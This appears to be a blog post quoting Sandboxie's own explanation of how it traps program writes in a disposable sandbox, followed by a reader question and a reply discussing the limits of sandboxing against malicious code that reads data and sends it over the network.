Sandboxie describes itself like this:
When you run a program on your computer, data flows from the hard disk to the program via read operations. The data is then processed and displayed, and finally flows back from the progam to the hard disk via write operations.
For example, if you run the Freecell program to play a game, it starts by reading the previously recorded statistics, displaying and altering them as you play the game, and finally writing them back to disk for future reference.
Sandboxie changes the rules such that write operations do not make it back to your hard disk.
The illustration shows the key component of Sandboxie: a transient storage area, or sandbox. Data flows in both directions between programs and the sandbox. During read operations, data may flow from the hard disk into the sandbox. But data never flows back from the sandbox into the hard disk.
If you run Freecell inside the Sandboxie environment, Sandboxie reads the statistics data from the hard disk into the sandbox, to satisfy the read requested by Freecell. When the game later writes the statistics, Sandboxie intercepts this operation and directs the data to the sandbox.
If you then run Freecell without the aid of Sandboxie, the read operation would bypass the sandbox altogether, and the statistics would be retrieved from the hard disk.
The transient nature of the sandbox makes it is easy to get rid of everything in it. If you were to throw away the sandbox, by deleting everything in it, the sandboxed statistics would be gone for good, as if they had never been there in the first place.
Sandboxie and the Web
Protecting your Freecell statistics using Sandboxie may be a good idea when a less qualified player comes along, but you will probably want to play most of your games outside the sandbox. On the other hand, you may want to run your Web browser inside the sandbox most of the time. This way any incoming, unsolicited software (spyware, malware and the like) that you download, is trapped in the sandbox. Changes made to your list of Favorites or Bookmarks, hijacking of your preferred start page, new and unwanted icons on your desktop — all these, and more, are trapped in and bound to the sandbox.
You could also try a new toolbar add-on, browser extension or just about any kind of software. If you don't like it, you throw away the sandbox, and start again with a fresh sandbox. On the other hand, if you do like the new piece of software, you can re-install it outside the sandbox so it becomes a permanent part of your system.
Sandboxie intercepts changes to both your files and registry settings, making it virtually impossible for any software to reach outside the sandbox.
Sandboxie traps cached browser items into the sandbox as a by-product of normal operation, so when you throw away the sandbox, all the history records and other side-effects of your browsing disappear as well.
Which means, if I understand it right, that it would be safe to run IE with ActiveX turned on? It might even be safe to run Exchange???
Not quite. First, as with any sandbox, it only helps you to the extent that comprising the sandboxed application itself is not the goal. So if the goal is to commandeer Exchange itself, as opposed to the rest of the machine on which it is running, running Exchange sandboxed won’t prevent that. Second, code running inside the sandbox still has a lot of power. Reads and networking still work. So malicious code (e.g. compromising ActiveX controls) can read private data and send the results out over the net. The sandbox only makes it harder to write such exploits because fewer capabilities are available in the sandbox. If it depended on overwriting system files and affecting the application the next time it is started, running the application in a fresh sandbox every time would thwart the attack.
What’s missing is a way to determine if only the changes you knowingly made will be written back to the disk if you save the results of running in the sandbox back to disk. (Or is that not a possibility?) In any case, the fact that compromises are often not apparent to the user is key. If only the sandbox communicated what had been changed–and if the user had the time/patience and ability to make sense of that communication… then we might be getting somewhere… As it is, this might be a useful tool for some people for some purposes, but is not close to a general solution…